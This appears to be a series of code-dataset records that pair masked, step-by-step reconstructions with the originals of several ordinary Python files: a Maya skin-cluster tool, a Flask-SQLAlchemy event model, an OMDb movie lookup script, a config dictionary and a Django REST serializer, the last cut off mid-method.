\"\"\"\n result = []\n if not (pm.objExists(_transform)):\n return result\n validList = mel.eval('findRelatedDeformer(\"' + str(_transform) + '\")')\n if validList is None:\n return result\n for elem in validList:\n if pm.nodeType(elem) == 'skinCluster':\n result.append(elem)\n pm.select(result, r=True)\n result_node = pm.selected()\n \n if len(result_node) > 1:\n return result_node\n else:\n try:\n return result_node[0]\n except IndexError:\n return False\n\n @staticmethod\n def getBindJointsFromCluster(clusterList):\n \"\"\"\n Find all joints attached to a skinCluster\n @param clusterList: List. list of skin Clusters\n return dic with key: skin Cluster. Value: list of joint \n \"\"\"\n bindJoints_dic = {}\n for cluster in clusterList:\n all_binds_jnts = [x for x in pm.listConnections(str(cluster) + '.matrix[*]', s=1)]\n bindJoints_dic.update({str(cluster):all_binds_jnts})\n return bindJoints_dic\n \n @staticmethod\n def getAllMeshes():\n \"\"\"\n return: list of all meshes / geometry\n \"\"\"\n shapesList = pm.ls(type=\"mesh\", ni=1)\n transformList = list(set(pm.listRelatives(shapesList ,parent=True)))\n transformList.sort()\n return transformList\n \n @staticmethod\n def getAllShapes(transforms):\n \"\"\"\n @param transforms: List. \n return : dictionnary with key:mesh / values: shapes\n \"\"\"\n shapes_dic = {}\n for transform in transforms:\n all_shapes = pm.PyNode(transform).getShapes(ni=True)\n shapes_dic.update({str(transform):all_shapes}) \n return shapes_dic\n \n \n def getSkinClusterbyShape(self, shapes):\n \"\"\"\n get skinCluster attached to the shape\n @param shapes: List\n return: List\n \"\"\"\n cluster_dic = {}\n for shape in shapes: \n try:\n incoming = mc.listConnections('{}.inMesh'.format(shape))[0]\n if pm.objectType(incoming) == 'skinCluster':\n cluster_dic.update({str(shape):incoming})\n else:\n skinCluster = self.getSkinCluster(shape)\n if skinCluster:\n if len(skinCluster) > 1:\n cluster_dic.update({str(shape):'None'})\n else:\n cluster_dic.update({str(shape):skinCluster}) \n else:\n cluster_dic.update({str(shape):'None'}) \n except TypeError:\n cluster_dic.update({str(shape):'None'})\n return cluster_dic\n\n \n \n# ===============================\n# BUILD WINDOW\n# ===============================\n\n\ndef showUI(dialog = False):\n if dialog:\n MultiSkin_UI.show_dialog()\n else: \n # Make sure the UI is deleted before recreating\n global tools_cw_ui\n try:\n tools_cw_ui.deleteLater()\n except:\n pass\n tools_cw_ui = MultiSkin_UI()\n tools_cw_ui.show()\n \n \n \n# showUI()\n",
"step-ids": [
17,
18,
23,
24,
28
]
}
|
[
17,
18,
23,
24,
28
] |
<|reserved_special_token_0|>
class Event(db.Model):
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
class EventSchema(ma.Schema):
class Meta:
fields = ('id', 'name', 'venue', 'location_lat', 'location_long',
'date_created', 'start_time', 'duration', 'coordinator_name',
'coordinator_contact', 'status_id', 'org_id', 'description')
<|reserved_special_token_0|>
class EventFullInfoSchema(ma.Schema):
event = ma.Nested(event_schema)
admin = ma.Nested(admin_limited_schema)
status = ma.Nested(event_status_schema)
org_unit = ma.Nested(org_unit_schema)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Event(db.Model):
__tablename__ = 'event'
    __table_args__ = (
        ForeignKeyConstraint(['status_id'], ['event_status.id']),
        ForeignKeyConstraint(['org_id'], ['org_unit.id']),
        ForeignKeyConstraint(['created_by'], ['admin.id']),
    )
id = db.Column(db.Integer, primary_key=True)
name = db.Column(db.String(45), nullable=False)
venue = db.Column(db.String(45), nullable=False)
location_lat = db.Column(db.Float, nullable=False)
location_long = db.Column(db.Float, nullable=False)
date_created = db.Column(db.DateTime, nullable=False, default=datetime.now)
start_time = db.Column(db.DateTime, nullable=False)
duration = db.Column(db.Float, nullable=False)
coordinator_name = db.Column(db.String(45), nullable=False)
coordinator_contact = db.Column(db.Integer, nullable=False)
status_id = db.Column(db.Integer, nullable=False)
org_id = db.Column(db.Integer, nullable=False)
created_by = db.Column(db.Integer, nullable=False)
description = db.Column(db.String(500), nullable=False)
def __init__(self, name, venue, location_lat, location_long, start_time,
duration, coordinator_name, coordinator_contact, status_id, org_id,
created_by, description):
self.name = name
self.venue = venue
self.location_lat = location_lat
self.location_long = location_long
self.start_time = start_time
self.duration = duration
self.coordinator_name = coordinator_name
self.coordinator_contact = coordinator_contact
self.status_id = status_id
self.org_id = org_id
self.created_by = created_by
self.description = description
class EventSchema(ma.Schema):
class Meta:
fields = ('id', 'name', 'venue', 'location_lat', 'location_long',
'date_created', 'start_time', 'duration', 'coordinator_name',
'coordinator_contact', 'status_id', 'org_id', 'description')
<|reserved_special_token_0|>
class EventFullInfoSchema(ma.Schema):
event = ma.Nested(event_schema)
admin = ma.Nested(admin_limited_schema)
status = ma.Nested(event_status_schema)
org_unit = ma.Nested(org_unit_schema)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Event(db.Model):
__tablename__ = 'event'
    __table_args__ = (
        ForeignKeyConstraint(['status_id'], ['event_status.id']),
        ForeignKeyConstraint(['org_id'], ['org_unit.id']),
        ForeignKeyConstraint(['created_by'], ['admin.id']),
    )
id = db.Column(db.Integer, primary_key=True)
name = db.Column(db.String(45), nullable=False)
venue = db.Column(db.String(45), nullable=False)
location_lat = db.Column(db.Float, nullable=False)
location_long = db.Column(db.Float, nullable=False)
date_created = db.Column(db.DateTime, nullable=False, default=datetime.now)
start_time = db.Column(db.DateTime, nullable=False)
duration = db.Column(db.Float, nullable=False)
coordinator_name = db.Column(db.String(45), nullable=False)
coordinator_contact = db.Column(db.Integer, nullable=False)
status_id = db.Column(db.Integer, nullable=False)
org_id = db.Column(db.Integer, nullable=False)
created_by = db.Column(db.Integer, nullable=False)
description = db.Column(db.String(500), nullable=False)
def __init__(self, name, venue, location_lat, location_long, start_time,
duration, coordinator_name, coordinator_contact, status_id, org_id,
created_by, description):
self.name = name
self.venue = venue
self.location_lat = location_lat
self.location_long = location_long
self.start_time = start_time
self.duration = duration
self.coordinator_name = coordinator_name
self.coordinator_contact = coordinator_contact
self.status_id = status_id
self.org_id = org_id
self.created_by = created_by
self.description = description
class EventSchema(ma.Schema):
class Meta:
fields = ('id', 'name', 'venue', 'location_lat', 'location_long',
'date_created', 'start_time', 'duration', 'coordinator_name',
'coordinator_contact', 'status_id', 'org_id', 'description')
event_schema = EventSchema()
events_schema = EventSchema(many=True)
class EventFullInfoSchema(ma.Schema):
event = ma.Nested(event_schema)
admin = ma.Nested(admin_limited_schema)
status = ma.Nested(event_status_schema)
org_unit = ma.Nested(org_unit_schema)
event_with_full_schema = EventFullInfoSchema()
events_with_full_schema = EventFullInfoSchema(many=True)
<|reserved_special_token_1|>
from database import db
from database import ma
from datetime import datetime
from sqlalchemy import ForeignKeyConstraint
from models.admin import Admin, admin_limited_schema
from models.event_status import EventStatus, event_status_schema
from models.org_unit import org_unit_schema
class Event(db.Model):
__tablename__ = 'event'
    __table_args__ = (
        ForeignKeyConstraint(['status_id'], ['event_status.id']),
        ForeignKeyConstraint(['org_id'], ['org_unit.id']),
        ForeignKeyConstraint(['created_by'], ['admin.id']),
    )
id = db.Column(db.Integer, primary_key=True)
name = db.Column(db.String(45), nullable=False)
venue = db.Column(db.String(45), nullable=False)
location_lat = db.Column(db.Float, nullable=False)
location_long = db.Column(db.Float, nullable=False)
date_created = db.Column(db.DateTime, nullable=False, default=datetime.now)
start_time = db.Column(db.DateTime, nullable=False)
duration = db.Column(db.Float, nullable=False)
coordinator_name = db.Column(db.String(45), nullable=False)
coordinator_contact = db.Column(db.Integer, nullable=False)
status_id = db.Column(db.Integer, nullable=False)
org_id = db.Column(db.Integer, nullable=False)
created_by = db.Column(db.Integer, nullable=False)
description = db.Column(db.String(500), nullable=False)
def __init__(self, name, venue, location_lat, location_long, start_time,
duration, coordinator_name, coordinator_contact, status_id, org_id,
created_by, description):
self.name = name
self.venue = venue
self.location_lat = location_lat
self.location_long = location_long
self.start_time = start_time
self.duration = duration
self.coordinator_name = coordinator_name
self.coordinator_contact = coordinator_contact
self.status_id = status_id
self.org_id = org_id
self.created_by = created_by
self.description = description
class EventSchema(ma.Schema):
class Meta:
fields = ('id', 'name', 'venue', 'location_lat', 'location_long',
'date_created', 'start_time', 'duration', 'coordinator_name',
'coordinator_contact', 'status_id', 'org_id', 'description')
event_schema = EventSchema()
events_schema = EventSchema(many=True)
class EventFullInfoSchema(ma.Schema):
event = ma.Nested(event_schema)
admin = ma.Nested(admin_limited_schema)
status = ma.Nested(event_status_schema)
org_unit = ma.Nested(org_unit_schema)
event_with_full_schema = EventFullInfoSchema()
events_with_full_schema = EventFullInfoSchema(many=True)
<|reserved_special_token_1|>
from database import db
from database import ma
from datetime import datetime
from sqlalchemy import ForeignKeyConstraint
from models.admin import Admin, admin_limited_schema
from models.event_status import EventStatus, event_status_schema
from models.org_unit import org_unit_schema
class Event(db.Model):
# class corresponding to the event table in the database
__tablename__ = 'event'
__table_args__ = (
ForeignKeyConstraint(['status_id'], ['event_status.id']),
ForeignKeyConstraint(['org_id'], ['org_unit.id']),
ForeignKeyConstraint(['created_by'], ['admin.id']),
)
id = db.Column(db.Integer, primary_key=True)
name = db.Column(db.String(45), nullable=False)
venue = db.Column(db.String(45), nullable=False)
location_lat = db.Column(db.Float, nullable=False)
location_long = db.Column(db.Float, nullable=False)
date_created = db.Column(db.DateTime, nullable=False, default=datetime.now)
start_time = db.Column(db.DateTime, nullable=False)
duration = db.Column(db.Float, nullable=False)
coordinator_name = db.Column(db.String(45), nullable=False)
coordinator_contact = db.Column(db.Integer, nullable=False)
status_id = db.Column(db.Integer, nullable=False)
org_id = db.Column(db.Integer, nullable=False)
created_by = db.Column(db.Integer, nullable=False)
description = db.Column(db.String(500), nullable=False)
def __init__(self, name, venue, location_lat, location_long, start_time, duration, coordinator_name, coordinator_contact, status_id, org_id, created_by, description):
self.name = name
self.venue = venue
self.location_lat = location_lat
self.location_long = location_long
self.start_time = start_time
self.duration = duration
self.coordinator_name = coordinator_name
self.coordinator_contact = coordinator_contact
self.status_id = status_id
self.org_id = org_id
self.created_by = created_by
self.description = description
class EventSchema(ma.Schema):
class Meta:
fields = ('id', 'name', 'venue', 'location_lat', 'location_long', 'date_created', 'start_time',
'duration', 'coordinator_name', 'coordinator_contact', 'status_id', 'org_id', 'description')
# init schema
event_schema = EventSchema()
events_schema = EventSchema(many=True)
class EventFullInfoSchema(ma.Schema):
event = ma.Nested(event_schema)
admin = ma.Nested(admin_limited_schema)
status = ma.Nested(event_status_schema)
org_unit = ma.Nested(org_unit_schema)
event_with_full_schema = EventFullInfoSchema()
events_with_full_schema = EventFullInfoSchema(many=True)
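# --- Usage sketch (editor's illustration, not part of the original record) ---
# Assuming an active Flask application context with the `db` and `ma`
# instances from `database` bound to the app, a row could be created and
# serialized roughly like this (all field values are made up):
#
#     from datetime import datetime
#
#     ev = Event(name='Launch party', venue='Main hall',
#                location_lat=47.37, location_long=8.54,
#                start_time=datetime(2024, 5, 1, 18, 0), duration=2.5,
#                coordinator_name='Alex', coordinator_contact=5551234,
#                status_id=1, org_id=1, created_by=1,
#                description='Opening event')
#     db.session.add(ev)
#     db.session.commit()
#     print(event_schema.dump(ev))  # dict restricted to the Meta fields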
|
flexible
|
{
"blob_id": "f3167d8f1a806c38fb10672605d8e94265d2fc9c",
"index": 723,
"step-1": "<mask token>\n\n\nclass Event(db.Model):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n\nclass EventSchema(ma.Schema):\n\n\n class Meta:\n fields = ('id', 'name', 'venue', 'location_lat', 'location_long',\n 'date_created', 'start_time', 'duration', 'coordinator_name',\n 'coordinator_contact', 'status_id', 'org_id', 'description')\n\n\n<mask token>\n\n\nclass EventFullInfoSchema(ma.Schema):\n event = ma.Nested(event_schema)\n admin = ma.Nested(admin_limited_schema)\n status = ma.Nested(event_status_schema)\n org_unit = ma.Nested(org_unit_schema)\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass Event(db.Model):\n __tablename__ = 'event'\n __table_args__ = ForeignKeyConstraint(['status_id'], ['event_status.id']\n ), ForeignKeyConstraint(['org_id'], ['org_unit.id']\n ), ForeignKeyConstraint(['created_by'], ['admin.id'])\n id = db.Column(db.Integer, primary_key=True)\n name = db.Column(db.String(45), nullable=False)\n venue = db.Column(db.String(45), nullable=False)\n location_lat = db.Column(db.Float, nullable=False)\n location_long = db.Column(db.Float, nullable=False)\n date_created = db.Column(db.DateTime, nullable=False, default=datetime.now)\n start_time = db.Column(db.DateTime, nullable=False)\n duration = db.Column(db.Float, nullable=False)\n coordinator_name = db.Column(db.String(45), nullable=False)\n coordinator_contact = db.Column(db.Integer, nullable=False)\n status_id = db.Column(db.Integer, nullable=False)\n org_id = db.Column(db.Integer, nullable=False)\n created_by = db.Column(db.Integer, nullable=False)\n description = db.Column(db.String(500), nullable=False)\n\n def __init__(self, name, venue, location_lat, location_long, start_time,\n duration, coordinator_name, coordinator_contact, status_id, org_id,\n created_by, description):\n self.name = name\n self.venue = venue\n self.location_lat = location_lat\n self.location_long = location_long\n self.start_time = start_time\n self.duration = duration\n self.coordinator_name = coordinator_name\n self.coordinator_contact = coordinator_contact\n self.status_id = status_id\n self.org_id = org_id\n self.created_by = created_by\n self.description = description\n\n\nclass EventSchema(ma.Schema):\n\n\n class Meta:\n fields = ('id', 'name', 'venue', 'location_lat', 'location_long',\n 'date_created', 'start_time', 'duration', 'coordinator_name',\n 'coordinator_contact', 'status_id', 'org_id', 'description')\n\n\n<mask token>\n\n\nclass EventFullInfoSchema(ma.Schema):\n event = ma.Nested(event_schema)\n admin = ma.Nested(admin_limited_schema)\n status = ma.Nested(event_status_schema)\n org_unit = ma.Nested(org_unit_schema)\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass Event(db.Model):\n __tablename__ = 'event'\n __table_args__ = ForeignKeyConstraint(['status_id'], ['event_status.id']\n ), ForeignKeyConstraint(['org_id'], ['org_unit.id']\n ), ForeignKeyConstraint(['created_by'], ['admin.id'])\n id = db.Column(db.Integer, primary_key=True)\n name = db.Column(db.String(45), nullable=False)\n venue = db.Column(db.String(45), nullable=False)\n location_lat = db.Column(db.Float, nullable=False)\n location_long = db.Column(db.Float, nullable=False)\n date_created = db.Column(db.DateTime, nullable=False, default=datetime.now)\n start_time = db.Column(db.DateTime, nullable=False)\n duration = db.Column(db.Float, nullable=False)\n coordinator_name = db.Column(db.String(45), nullable=False)\n coordinator_contact = db.Column(db.Integer, nullable=False)\n status_id = db.Column(db.Integer, nullable=False)\n org_id = db.Column(db.Integer, nullable=False)\n created_by = db.Column(db.Integer, nullable=False)\n description = db.Column(db.String(500), nullable=False)\n\n def __init__(self, name, venue, location_lat, location_long, start_time,\n duration, coordinator_name, coordinator_contact, status_id, org_id,\n created_by, description):\n self.name = name\n self.venue = venue\n self.location_lat = location_lat\n self.location_long = location_long\n self.start_time = start_time\n self.duration = duration\n self.coordinator_name = coordinator_name\n self.coordinator_contact = coordinator_contact\n self.status_id = status_id\n self.org_id = org_id\n self.created_by = created_by\n self.description = description\n\n\nclass EventSchema(ma.Schema):\n\n\n class Meta:\n fields = ('id', 'name', 'venue', 'location_lat', 'location_long',\n 'date_created', 'start_time', 'duration', 'coordinator_name',\n 'coordinator_contact', 'status_id', 'org_id', 'description')\n\n\nevent_schema = EventSchema()\nevents_schema = EventSchema(many=True)\n\n\nclass EventFullInfoSchema(ma.Schema):\n event = ma.Nested(event_schema)\n admin = ma.Nested(admin_limited_schema)\n status = ma.Nested(event_status_schema)\n org_unit = ma.Nested(org_unit_schema)\n\n\nevent_with_full_schema = EventFullInfoSchema()\nevents_with_full_schema = EventFullInfoSchema(many=True)\n",
"step-4": "from database import db\nfrom database import ma\nfrom datetime import datetime\nfrom sqlalchemy import ForeignKeyConstraint\nfrom models.admin import Admin, admin_limited_schema\nfrom models.event_status import EventStatus, event_status_schema\nfrom models.org_unit import org_unit_schema\n\n\nclass Event(db.Model):\n __tablename__ = 'event'\n __table_args__ = ForeignKeyConstraint(['status_id'], ['event_status.id']\n ), ForeignKeyConstraint(['org_id'], ['org_unit.id']\n ), ForeignKeyConstraint(['created_by'], ['admin.id'])\n id = db.Column(db.Integer, primary_key=True)\n name = db.Column(db.String(45), nullable=False)\n venue = db.Column(db.String(45), nullable=False)\n location_lat = db.Column(db.Float, nullable=False)\n location_long = db.Column(db.Float, nullable=False)\n date_created = db.Column(db.DateTime, nullable=False, default=datetime.now)\n start_time = db.Column(db.DateTime, nullable=False)\n duration = db.Column(db.Float, nullable=False)\n coordinator_name = db.Column(db.String(45), nullable=False)\n coordinator_contact = db.Column(db.Integer, nullable=False)\n status_id = db.Column(db.Integer, nullable=False)\n org_id = db.Column(db.Integer, nullable=False)\n created_by = db.Column(db.Integer, nullable=False)\n description = db.Column(db.String(500), nullable=False)\n\n def __init__(self, name, venue, location_lat, location_long, start_time,\n duration, coordinator_name, coordinator_contact, status_id, org_id,\n created_by, description):\n self.name = name\n self.venue = venue\n self.location_lat = location_lat\n self.location_long = location_long\n self.start_time = start_time\n self.duration = duration\n self.coordinator_name = coordinator_name\n self.coordinator_contact = coordinator_contact\n self.status_id = status_id\n self.org_id = org_id\n self.created_by = created_by\n self.description = description\n\n\nclass EventSchema(ma.Schema):\n\n\n class Meta:\n fields = ('id', 'name', 'venue', 'location_lat', 'location_long',\n 'date_created', 'start_time', 'duration', 'coordinator_name',\n 'coordinator_contact', 'status_id', 'org_id', 'description')\n\n\nevent_schema = EventSchema()\nevents_schema = EventSchema(many=True)\n\n\nclass EventFullInfoSchema(ma.Schema):\n event = ma.Nested(event_schema)\n admin = ma.Nested(admin_limited_schema)\n status = ma.Nested(event_status_schema)\n org_unit = ma.Nested(org_unit_schema)\n\n\nevent_with_full_schema = EventFullInfoSchema()\nevents_with_full_schema = EventFullInfoSchema(many=True)\n",
"step-5": "from database import db\nfrom database import ma\nfrom datetime import datetime\nfrom sqlalchemy import ForeignKeyConstraint\nfrom models.admin import Admin, admin_limited_schema\nfrom models.event_status import EventStatus, event_status_schema\nfrom models.org_unit import org_unit_schema\n\nclass Event(db.Model):\n # class corresponding to the event table in the database\n __tablename__ = 'event'\n __table_args__ = (\n ForeignKeyConstraint(['status_id'], ['event_status.id']),\n ForeignKeyConstraint(['org_id'], ['org_unit.id']),\n ForeignKeyConstraint(['created_by'], ['admin.id']),\n )\n id = db.Column(db.Integer, primary_key=True)\n name = db.Column(db.String(45), nullable=False)\n venue = db.Column(db.String(45), nullable=False)\n location_lat = db.Column(db.Float, nullable=False)\n location_long = db.Column(db.Float, nullable=False)\n date_created = db.Column(db.DateTime, nullable=False, default=datetime.now)\n start_time = db.Column(db.DateTime, nullable=False)\n duration = db.Column(db.Float, nullable=False)\n coordinator_name = db.Column(db.String(45), nullable=False)\n coordinator_contact = db.Column(db.Integer, nullable=False)\n status_id = db.Column(db.Integer, nullable=False)\n org_id = db.Column(db.Integer, nullable=False)\n created_by = db.Column(db.Integer, nullable=False)\n description = db.Column(db.String(500), nullable=False)\n\n def __init__(self, name, venue, location_lat, location_long, start_time, duration, coordinator_name, coordinator_contact, status_id, org_id, created_by, description):\n self.name = name\n self.venue = venue\n self.location_lat = location_lat\n self.location_long = location_long\n self.start_time = start_time\n self.duration = duration\n self.coordinator_name = coordinator_name\n self.coordinator_contact = coordinator_contact\n self.status_id = status_id\n self.org_id = org_id\n self.created_by = created_by\n self.description = description\n\n\nclass EventSchema(ma.Schema):\n class Meta:\n fields = ('id', 'name', 'venue', 'location_lat', 'location_long', 'date_created', 'start_time',\n 'duration', 'coordinator_name', 'coordinator_contact', 'status_id', 'org_id', 'description')\n\n\n# init schema\nevent_schema = EventSchema()\nevents_schema = EventSchema(many=True)\n\n\nclass EventFullInfoSchema(ma.Schema):\n event = ma.Nested(event_schema)\n admin = ma.Nested(admin_limited_schema)\n status = ma.Nested(event_status_schema)\n org_unit = ma.Nested(org_unit_schema)\n\n\n\nevent_with_full_schema = EventFullInfoSchema()\nevents_with_full_schema = EventFullInfoSchema(many=True)",
"step-ids": [
4,
6,
7,
8,
9
]
}
|
[
4,
6,
7,
8,
9
] |
<|reserved_special_token_0|>
def rating_msg(rating):
if rating > 80:
return 'You should watch this movie right now!\n'
elif rating < 50:
return 'Avoid this movie at all cost!\n'
else:
return ''
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def rating_msg(rating):
if rating > 80:
return 'You should watch this movie right now!\n'
elif rating < 50:
return 'Avoid this movie at all cost!\n'
else:
return ''
<|reserved_special_token_0|>
if r.status_code == requests.status_codes.codes.ok:
movie_data = json.loads(r.text)
if 'Error' in movie_data:
print(movie_data['Error'])
exit(1)
print(f"\nTitle: {movie_data['Title']}")
print(f"Year: {movie_data['Year']}")
print(f"Rating: {movie_data['Rated']}")
print(f"Running Time: {movie_data['Runtime']}")
print(f"\nDescription: {movie_data['Plot']}")
print('\n' + rating_msg(int(movie_data['Metascore'])), end='')
else:
print(r)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
BASE_URL = 'http://www.omdbapi.com/'
def rating_msg(rating):
if rating > 80:
return 'You should watch this movie right now!\n'
elif rating < 50:
return 'Avoid this movie at all cost!\n'
else:
return ''
api_key = sys.argv[1]
title = input('Enter the name of a movie: ')
data = {'apikey': api_key, 't': title}
r = requests.get(BASE_URL, data)
if r.status_code == requests.status_codes.codes.ok:
movie_data = json.loads(r.text)
if 'Error' in movie_data:
print(movie_data['Error'])
exit(1)
print(f"\nTitle: {movie_data['Title']}")
print(f"Year: {movie_data['Year']}")
print(f"Rating: {movie_data['Rated']}")
print(f"Running Time: {movie_data['Runtime']}")
print(f"\nDescription: {movie_data['Plot']}")
print('\n' + rating_msg(int(movie_data['Metascore'])), end='')
else:
print(r)
<|reserved_special_token_1|>
import sys
import json
import requests
BASE_URL = 'http://www.omdbapi.com/'
def rating_msg(rating):
if rating > 80:
return 'You should watch this movie right now!\n'
elif rating < 50:
return 'Avoid this movie at all cost!\n'
else:
return ''
api_key = sys.argv[1]
title = input('Enter the name of a movie: ')
data = {'apikey': api_key, 't': title}
r = requests.get(BASE_URL, data)
if r.status_code == requests.status_codes.codes.ok:
movie_data = json.loads(r.text)
if 'Error' in movie_data:
print(movie_data['Error'])
exit(1)
print(f"\nTitle: {movie_data['Title']}")
print(f"Year: {movie_data['Year']}")
print(f"Rating: {movie_data['Rated']}")
print(f"Running Time: {movie_data['Runtime']}")
print(f"\nDescription: {movie_data['Plot']}")
print('\n' + rating_msg(int(movie_data['Metascore'])), end='')
else:
print(r)
<|reserved_special_token_1|>
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import sys
import json
import requests
BASE_URL = 'http://www.omdbapi.com/'
def rating_msg(rating):
if rating > 80:
return 'You should watch this movie right now!\n'
elif rating < 50:
return 'Avoid this movie at all cost!\n'
else:
return ''
api_key = sys.argv[1]
title = input('Enter the name of a movie: ')
data = {'apikey': api_key, 't': title}
r = requests.get(BASE_URL, data)
if r.status_code == requests.status_codes.codes.ok:
movie_data = json.loads(r.text)
if 'Error' in movie_data:
print(movie_data['Error'])
exit(1)
print(f'\nTitle: {movie_data["Title"]}')
print(f'Year: {movie_data["Year"]}')
print(f'Rating: {movie_data["Rated"]}')
print(f'Running Time: {movie_data["Runtime"]}')
print(f'\nDescription: {movie_data["Plot"]}')
print('\n' + rating_msg(int(movie_data['Metascore'])), end="")
else:
print(r)
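# --- Editor's note (illustrative, not part of the original) ---
# Expected behaviour of rating_msg for a few Metascore values:
#
#     rating_msg(85)  ->  'You should watch this movie right now!\n'
#     rating_msg(40)  ->  'Avoid this movie at all cost!\n'
#     rating_msg(65)  ->  ''
#
# Scores of exactly 80 or exactly 50 both yield '' because the
# comparisons are strict (> 80 and < 50).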
|
flexible
|
{
"blob_id": "7f33effa86fc3a80fce0e5e1ecf97ab4ca80402d",
"index": 1833,
"step-1": "<mask token>\n\n\ndef rating_msg(rating):\n if rating > 80:\n return 'You should watch this movie right now!\\n'\n elif rating < 50:\n return 'Avoid this movie at all cost!\\n'\n else:\n return ''\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef rating_msg(rating):\n if rating > 80:\n return 'You should watch this movie right now!\\n'\n elif rating < 50:\n return 'Avoid this movie at all cost!\\n'\n else:\n return ''\n\n\n<mask token>\nif r.status_code == requests.status_codes.codes.ok:\n movie_data = json.loads(r.text)\n if 'Error' in movie_data:\n print(movie_data['Error'])\n exit(1)\n print(f\"\\nTitle: {movie_data['Title']}\")\n print(f\"Year: {movie_data['Year']}\")\n print(f\"Rating: {movie_data['Rated']}\")\n print(f\"Running Time: {movie_data['Runtime']}\")\n print(f\"\\nDescription: {movie_data['Plot']}\")\n print('\\n' + rating_msg(int(movie_data['Metascore'])), end='')\nelse:\n print(r)\n",
"step-3": "<mask token>\nBASE_URL = 'http://www.omdbapi.com/'\n\n\ndef rating_msg(rating):\n if rating > 80:\n return 'You should watch this movie right now!\\n'\n elif rating < 50:\n return 'Avoid this movie at all cost!\\n'\n else:\n return ''\n\n\napi_key = sys.argv[1]\ntitle = input('Enter the name of a movie: ')\ndata = {'apikey': api_key, 't': title}\nr = requests.get(BASE_URL, data)\nif r.status_code == requests.status_codes.codes.ok:\n movie_data = json.loads(r.text)\n if 'Error' in movie_data:\n print(movie_data['Error'])\n exit(1)\n print(f\"\\nTitle: {movie_data['Title']}\")\n print(f\"Year: {movie_data['Year']}\")\n print(f\"Rating: {movie_data['Rated']}\")\n print(f\"Running Time: {movie_data['Runtime']}\")\n print(f\"\\nDescription: {movie_data['Plot']}\")\n print('\\n' + rating_msg(int(movie_data['Metascore'])), end='')\nelse:\n print(r)\n",
"step-4": "import sys\nimport json\nimport requests\nBASE_URL = 'http://www.omdbapi.com/'\n\n\ndef rating_msg(rating):\n if rating > 80:\n return 'You should watch this movie right now!\\n'\n elif rating < 50:\n return 'Avoid this movie at all cost!\\n'\n else:\n return ''\n\n\napi_key = sys.argv[1]\ntitle = input('Enter the name of a movie: ')\ndata = {'apikey': api_key, 't': title}\nr = requests.get(BASE_URL, data)\nif r.status_code == requests.status_codes.codes.ok:\n movie_data = json.loads(r.text)\n if 'Error' in movie_data:\n print(movie_data['Error'])\n exit(1)\n print(f\"\\nTitle: {movie_data['Title']}\")\n print(f\"Year: {movie_data['Year']}\")\n print(f\"Rating: {movie_data['Rated']}\")\n print(f\"Running Time: {movie_data['Runtime']}\")\n print(f\"\\nDescription: {movie_data['Plot']}\")\n print('\\n' + rating_msg(int(movie_data['Metascore'])), end='')\nelse:\n print(r)\n",
"step-5": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nimport sys\nimport json\n\nimport requests\n\n\nBASE_URL = 'http://www.omdbapi.com/'\n\n\ndef rating_msg(rating):\n if rating > 80:\n return 'You should watch this movie right now!\\n'\n elif rating < 50:\n return 'Avoid this movie at all cost!\\n'\n else:\n return ''\n\n\napi_key = sys.argv[1]\n\ntitle = input('Enter the name of a movie: ')\n\ndata = {'apikey': api_key, 't': title}\nr = requests.get(BASE_URL, data)\n\nif r.status_code == requests.status_codes.codes.ok:\n movie_data = json.loads(r.text)\n if 'Error' in movie_data:\n print(movie_data['Error'])\n exit(1)\n\n print(f'\\nTitle: {movie_data[\"Title\"]}')\n print(f'Year: {movie_data[\"Year\"]}')\n print(f'Rating: {movie_data[\"Rated\"]}')\n print(f'Running Time: {movie_data[\"Runtime\"]}')\n print(f'\\nDescription: {movie_data[\"Plot\"]}')\n\n print('\\n' + rating_msg(int(movie_data['Metascore'])), end=\"\")\nelse:\n print(r)\n",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
config_info = {'n_input': 1, 'num_layers': 1, 'features': 20,
    'sequence_length': 1344, 'num_steps': None, 'lstm_size': None,
    'batch_size': None, 'init_learning_rate': None,
    'learning_rate_decay': None, 'init_epoch': None, 'max_epoch': None,
    'dropout_rate': None}
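# --- Editor's note (illustrative, not part of the original) ---
# The None entries look like placeholders to be filled in before training;
# a hypothetical caller might complete and consume the dict like so:
#
#     config_info.update(num_steps=30, lstm_size=128, batch_size=64,
#                        init_learning_rate=0.001, learning_rate_decay=0.99,
#                        init_epoch=5, max_epoch=50, dropout_rate=0.2)
#     seq_len = config_info['sequence_length']  # 1344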
|
flexible
|
{
"blob_id": "8ede786526f4b730173777d9d3b9c7e4554fc887",
"index": 2443,
"step-1": "<mask token>\n",
"step-2": "config_info = {'n_input': 1, 'num_layers': 1, 'features': 20,\n 'sequence_length': 1344, 'num_steps': None, 'lstm_size': None,\n 'batch_size': None, 'init_learning_rate': None, 'learning_rate_decay':\n None, 'init_epoch': None, 'max_epoch': None, 'dropout_rate': None}\n",
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0,
1
]
}
|
[
0,
1
] |
from abc import ABC
from rest_framework import serializers
from shopping_cars.models import Order, ShoppingCart
class OrderSerializer(serializers.ModelSerializer):
class Meta:
model = Order
fields = '__all__'
class OrderProductSerializer(serializers.ModelSerializer):
class Meta:
model = ShoppingCart
fields = '__all__'
    # Two ways to validate:
    # 1) field-level validators (validate_<field_name>), which run first
def validate_quantity(self, value):
